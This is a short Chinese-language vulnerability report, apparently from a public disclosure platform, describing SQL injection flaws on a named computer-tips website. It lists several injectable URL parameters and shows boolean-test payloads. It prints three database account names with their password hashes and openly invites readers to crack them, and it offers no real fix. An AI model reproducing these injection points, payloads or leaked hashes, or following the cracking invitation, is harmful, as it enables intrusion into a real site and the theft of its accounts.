由于没有对参数r进行有效的过滤从而导致SQL注入漏洞的产生。
具体链接:
?r=184626
在r参数的后面添加12345=12345与12345=54321返回的结果是不一样的哦:
?r=184626 12345=12345
?r=184626 12345=54321
除此之外,www.xuhantao.com,还有其他链接也存在SQL注入漏洞如下:
?action=view&id=1
?id=11499
?t=新版
?cat=470
等等,涛涛电脑知识网,请sina明察!!!
可获取当前数据库版本、当前用户等等信息如下:
还可获取其他更多信息,爆出数据库等账号的哈希,亲们可以去爆破哦:
hkgame 7d5a85d7187967a5
web_ro 043ff4215a4b78f9
web_rw 043f16695a4c1b41
修复方案:
你们都懂的
作者 风萧萧